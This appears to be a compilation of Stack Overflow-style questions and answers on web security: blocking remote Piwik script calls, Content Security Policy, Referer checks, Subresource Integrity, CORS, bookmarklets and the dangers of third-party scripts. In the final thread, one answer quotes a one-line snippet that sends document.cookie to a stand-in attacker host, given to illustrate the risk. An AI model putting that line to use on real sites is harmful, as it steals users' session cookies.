Prevent locally previewed PHP/HTML files from executing JavaScript on the server - javascript

I have some HTML/PHP pages that include JavaScript calls.
Those calls point to JS/PHP methods included in a library (Piwik) stored on a remote server.
They are triggered using an http://www.domainname.com/ prefix to point to the correct files.
I cannot modify the source code of the library.
When my own HTML/PHP pages are previewed locally in a browser, I mean using a c:\xxxx kind of path, not a localhost://xxxx one, the remote scripts are still called and do their processing.
I don't want this to happen; those scripts should only execute when called from a www.domainname.com page.
Can you help me secure this?
One can of course bypass this protection by modifying the web pages on the fly with a browser add-on while browsing the real web site, but that is a little harder to achieve.
I've opened an issue on the Piwik issue tracker, but I would like to secure my web site and its statistics against this issue as soon as possible, while waiting for a future Piwik update.
EDIT
The process I'd like to put in place would be:
Someone opens a page from anywhere other than www.domainname.com
> this page calls a JS method on a remote server (or not, it may be copied locally),
> this script calls a PHP script on the remote server,
> the PHP script says "hey, where the hell are you calling me from, go to hell!". Or the PHP script simply does not execute...
I've tried to play with .htaccess for that, but since any JS script must be delivered to the client, it also blocks the legitimate calls from www.domainname.com.

Untested, but I think you can use php_sapi_name() or the PHP_SAPI constant to detect the interface PHP is using, and branch your logic accordingly.
Not wanting to sound cheeky, but your situation sounds rather scary, and I would advise reading up on some PHP configuration best practices regarding security ;)
Edit after the question has been amended twice:
Now the problem is more clear. But you will struggle to secure this if the JavaScript and PHP are not on the same server.
If they are not on the same server, you will be reliant on HTTP headers (like the Referer or Origin header) which are fakeable.
But Piwik already tracks the referrer ("Piwik uses first-party cookies to keep track of some information (number of visits, original referrer, and unique visitor ID)"), so you can discount hits from invalid referrers.
If that is not enough, the standard way of making sure that a request to a web service comes from a verified source is a standard Cross-Site Request Forgery prevention technique: a CSRF "token", sometimes also called a "crumb" or "nonce". As this is analytics software, I would be surprised if Piwik does not do this already, if it is possible with their architecture. I would ask them.
Most web frameworks these days have CSRF token generators and APIs you should be able to make use of, and it's not hard to make your own, but if you cannot amend the JS you will have problems passing the token around. Again, the Piwik JS API may have methods for passing session IDs and similar data around.

Original answer
This can be accomplished with a Content Security Policy to restrict the domains that scripts can be called from:
CSP defines the Content-Security-Policy HTTP header that allows you to create a whitelist of sources of trusted content, and instructs the browser to only execute or render resources from those sources.
Therefore, you can set the script policy to 'self' to only allow scripts from your current origin (here, the local file system) to be executed. Any remote ones will not be allowed.
Normally this is only available where you can set HTTP headers, but as you are running from the local file system this is not possible. However, you may be able to get around this with the http-equiv <meta> tag:
Authors who are unable to support signaling via HTTP headers can use tags with http-equiv="X-Content-Security-Policy" to define their policies. HTTP header-based policy will take precedence over tag-based policy if both are present.
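For example, using the modern header name (older implementations used the X- prefixed form quoted above), such a page-level policy might look like:

```html
<!-- Allow scripts only from the page's own origin; remote scripts are blocked. -->
<meta http-equiv="Content-Security-Policy" content="script-src 'self'">
```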
Answer after question edit
Look into the Referer or Origin HTTP headers. Referer is available for most requests; however, it is not sent when navigating from an HTTPS page to an HTTP resource, and if the user has a proxy or privacy plugin installed, it may be stripped.
Origin is sent for cross-domain XHR requests, and even for same-domain ones in some browsers.
You can check that these headers contain the domain the scripts should be called from; this can be done with .htaccess.
At the end of the day this doesn't make it secure, but, in your own words, it will make it "a little bit harder to achieve".
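A sketch of the .htaccess approach (assuming mod_rewrite is available; the domain is a placeholder, and note that an empty or spoofed Referer can still defeat this check):

```apache
# Deny requests for JS/PHP files unless the Referer is our own site.
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?domainname\.com/ [NC]
RewriteRule \.(js|php)$ - [F]
```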

Related

Monitoring web requests made by a specific javascript src file

I'm looking for some help with the following:
I'm building a website that links external scripts (these scripts can be changed anytime by the script owner).
I want to route any web requests sent by these scripts through my backend server as a proxy, so that I can parse the request and response to make sure they are not exfiltrating data from my website.
The idea here is to be able to leverage external scripts that cannot be trusted 100% with my data.
To enforce this, is it possible to intercept web requests made by <script>s from a different <script> that loaded early on?
If not, what is a better way?
If you cannot trust the scripts, this becomes more of a security question. You should get more information about web security in general.
An interesting example of such an implementation is Tampermonkey and its permission model (similar to what Android apps use).
Depending on the use-case, you may want to manually approve each js file and enforce it via integrity checking:
https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity
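With Subresource Integrity, the browser pins a script to a specific hash and refuses to run it if the remote file changes. A sketch of such a tag (the URL and digest below are placeholders, not real values):

```html
<script src="https://cdn.example.com/widget.js"
        integrity="sha384-PLACEHOLDER_BASE64_DIGEST"
        crossorigin="anonymous"></script>
```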
At the end of the day, you cannot programmatically check the security of an external JS file. You either trust its author or you don't.

Proper way to inject javascript code?

I would like to create a site with functionality similar to translate.google.com or hypothes.is: users can enter any address and the site opens with an additional menu. I guess this is done with some middleware/proxy solution where JavaScript is injected into the response, but I'm not sure. Do you have any idea how to implement the same feature? How can it work with secured (HTTPS) sites?
Many Thanks
The entire site is fetched by the server, the source code is parsed, code injected and then sent back to the requesting client.
It works with SSL just fine, because it's two separate requests - the request that gets sent to the endpoint is not seen by the user.
The certificate is valid because it's being served under Google's domain.
Actually implementing something like this could be quite complicated, because:
The HTML you are parsing won't necessarily conform to your expectations, or even be valid
The content you're forwarding to the client will likely reference resources with a relative URI. This means that you also need to intercept these requests and pull the resources (images, external css, js, etc) and serve them back to the client - and also rewrite the URLs.
It's very easy to break content by injecting arbitrary javascript. You need to be careful that your injected code is contained and won't interfere with any existing code on the site.
It's very common for an implementation such as this to have non-obvious security concerns, often resulting in XSS attacks being possible.
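The URL-rewriting point above can be sketched as follows. This is a naive regex approach with assumed names; a real implementation should use a proper HTML parser, since the HTML being proxied won't necessarily be valid:

```javascript
// Naive sketch: rewrite src/href attributes in fetched HTML so that
// relative and absolute resource URLs all point back at our proxy.
function rewriteResourceUrls(html, baseUrl, proxyPrefix) {
  return html.replace(/(src|href)="([^"]+)"/g, (match, attr, url) => {
    // Resolve the URL against the page being proxied.
    const absolute = new URL(url, baseUrl).toString();
    return `${attr}="${proxyPrefix}${encodeURIComponent(absolute)}"`;
  });
}
```

Every rewritten URL now hits the proxy, which can fetch the real resource, inspect it, and apply the same rewriting recursively.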

How are bookmarklets (JavaScript in a link) verified by servers? How is security kept?

I've been trying to access different domains from my JavaScript (to pull the page title) but cannot, because of the same-origin policy.
What I realized is that JavaScript "installed" into the browser via bookmarklets is not restrained by this policy.
This got me wondering how security is kept... for example, Delicious bookmarklets... I could just modify them and start making AJAX requests to delicious.com... I don't plan on doing this, but likewise someone could do this to a bookmarklet that I create.
How do you create security here?
Do some sites allow public access via ajax?
As far as the server is concerned, there is no such thing as AJAX. AJAX requests are just HTTP requests like any other.
The restriction on cross-domain AJAX is enforced by the browser to avoid cross-site attacks (you wouldn't want a third-party ad to have access to your Stack Overflow session data and be able to ship it somewhere else, would you?).
The browser (apparently) does not limit "bookmarklets" in the same way. If you decided to put a bit of script into a bookmark, I guess the browser is perfectly happy to execute it.
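A bookmarklet is nothing more than a `javascript:` URL stored as a bookmark, so "creating" one amounts to URL-encoding a snippet. A sketch (the helper name is made up for illustration):

```javascript
// Turn a JavaScript snippet into a bookmarklet URL that can be
// saved as a bookmark and executed on whatever page is open.
function makeBookmarklet(code) {
  return "javascript:" + encodeURIComponent(code);
}

// e.g. a bookmarklet that shows the current page's title:
const showTitle = makeBookmarklet("alert(document.title);void(0)");
```

Since the user can trivially edit that URL, nothing in it can be treated as trusted by a server, which is the point of the question: the server cannot "verify" a bookmarklet at all.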

XMLHttpRequest cross site scripting?

I realize this issue of cross site scripting has been covered, however being new to web development I had a few further questions.
Currently I am testing an html file I wrote on my PC connecting to a RESTFul web service on another machine. I am getting status=0. Is this considered cross-site scripting?
If a server hosts a file with javascript, and that javascript file has XMLHttpRequests to the server's own web services, will that work, or is that bad?
Apologies if any of these questions are stupid.
status=0 can mean a variety of things, and without knowing more about how you got to that point, it is very difficult to determine what, exactly, it means. You could be using an iframe, the other computer could genuinely be telling you that the status is 0... we don't know.
The general rule is that it doesn't matter where the JS comes from; it executes in the context of the page that loads it. This is what makes Google's hosted libraries possible (you know, using https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.js from a whole assortment of locations). And honestly, that in itself is not a security issue.
The security issue comes in when a js file tries to access another domain (or even subdomain), whether through manipulation of an iframe or through XMLHTTPRequest. It's at that point that the browser will "lay the smackdown" on the script.
You will have difficulty communicating from JavaScript on your hard drive (file:///) to any internet protocol (http|https) because of this.
No, that is not cross-site scripting. When you include a JS file from another server, it runs in your site, so you won't be able to access, through XMLHttpRequest, the site where the JS script is originally hosted.
If that were possible, then anybody hosting a jQuery file (and there are many such servers, including Google) would be open to XMLHttpRequests.
SO, IT'S NOT POSSIBLE.
If you want a JSON response from another server you can use JSONP. Google it for more info.
And cross-site scripting is when someone injects JavaScript code into your site in order to bypass access control.
You can use CORS for that. You can use the same code you use now, but the other server you request the page from via AJAX has to send the following header on that page:
Access-Control-Allow-Origin: http://yoursite.example.com
#or to allow all hosts
Access-Control-Allow-Origin: *
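Server-side, the logic amounts to echoing an allowed origin back (sketched here in JavaScript with an assumed helper name; the same logic applies to a PHP header() call):

```javascript
// Decide which Access-Control-Allow-Origin header (if any) to send
// for a given request Origin, based on a whitelist.
function corsHeaderFor(requestOrigin, allowedOrigins) {
  if (allowedOrigins.includes("*")) {
    return { "Access-Control-Allow-Origin": "*" };
  }
  if (allowedOrigins.includes(requestOrigin)) {
    // Echo back the specific origin rather than "*".
    return { "Access-Control-Allow-Origin": requestOrigin };
  }
  return {}; // No CORS header: the browser will block the response.
}
```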

When linking to an external .js file, isn't this a security risk?

Meaning if I have a website and I link to an external .js file, say for jQuery or some widget service, it can pretty easily just pull my authentication cookie and then log in as me, correct?
What if I am under SSL?
If you include Javascript or JSONP code from another domain, that code has full client-side power and can do whatever it wants.
It can send AJAX requests to automatically make your user do things, and it can steal document.cookie.
If your authentication cookies are HTTP-only, it can't steal them, but it can still impersonate the user using AJAX.
Never include a JS file from a domain you don't trust.
If your page uses SSL, all Javascript files must also use SSL, or an attacker can modify the un-encrypted Javascript to do whatever he wants.
For this reason, browsers will show a security warning if an SSL page uses non-SSL resources.
Note that JSONP is no exception to this rule.
Any JSONP response has full access to your DOM.
If security is a concern, do not use untrusted JSONP APIs.
I can only agree with SLaks and Haochi (+1 and all).
It is extremely insecure and you should never do it even if you trust the domain. Don't trust the answers that tell you that this is not the case because they are just wrong.
This is why now literally all of the links to JavaScript libraries hosted on Google's CDN on the Developer's Guide to Google Libraries API are secure HTTPS links, even though encrypting all of that traffic means a huge overhead even for Google.
They used to recommend using HTTPS only for websites that use HTTPS themselves, now there are no HTTP links in the examples at all.
The point is that you can trust Google and their CDN, but you can never trust the local DNS and routers in some poor schmuck's cafe from which your visitors may be connecting to your website, and Google's CDN is a great target for obvious reasons.
It depends on what you mean by "pull". As others have said here, cookies are only sent to the domain they originate from. However, a malicious third-party file can still send your cookies back to its server by executing some JavaScript code like:
// send the current page's cookies to the attacker's server
new Image().src = "http://badguy.tld/?" + encodeURIComponent(document.cookie);
So, only include scripts from trusted sources (Google, Facebook, etc.).
No, because cookies for your site will only be sent to your domain.
For example, when your browser sees yoursite.com it will send the authentication cookie for yoursite.com. If it also has to make a different request for jQuery (for the .js script) it won't send the cookie for yoursite.com (but it will send a cookie for the jQuery host, assuming one exists).
Remember, every resource is a separate request under HTTP.
I am not sure HttpOnly is fully supported across all browsers, so I wouldn't trust it to prevent attacks by itself.
If you're worried about a 3rd party attacker (i.e., not the site offering the JS file) grabbing the cookies, definitely use SSL and secure cookies.
If your page isn't running on SSL, using HttpOnly cookies doesn't actually prevent a man-in-the-middle attack, since an attacker in the middle can intercept the cookies regardless by just pretending to be your domain.
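The HttpOnly and Secure flags discussed above are set on the Set-Cookie response header. A minimal sketch of building such a header value (the helper name is hypothetical):

```javascript
// Build a Set-Cookie header value with the flags discussed above:
// HttpOnly keeps the cookie out of document.cookie, so injected
// scripts cannot read it; Secure restricts it to HTTPS connections.
function buildSetCookie(name, value, { httpOnly = true, secure = true } = {}) {
  let header = `${name}=${encodeURIComponent(value)}; Path=/`;
  if (httpOnly) header += "; HttpOnly";
  if (secure) header += "; Secure";
  return header;
}
```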
If you don't trust the host of an external .js file, don't use the external .js file. An external .js file can rewrite the entire page DOM to ask for a credit card number to be submitted to anyone, while looking (to an average user) the same as your own page, so you're pretty much doomed if you're getting malicious .js files. If you're not sure whether a .js host is trustworthy, host a copy of it locally (and check the file for security holes) or don't use it at all. Generally I prefer the latter.
In the specific case of JQuery, just use the copy on Google's CDN if you can't find a copy you like better.
Cookies are domain specific, guarded by same origin policy.
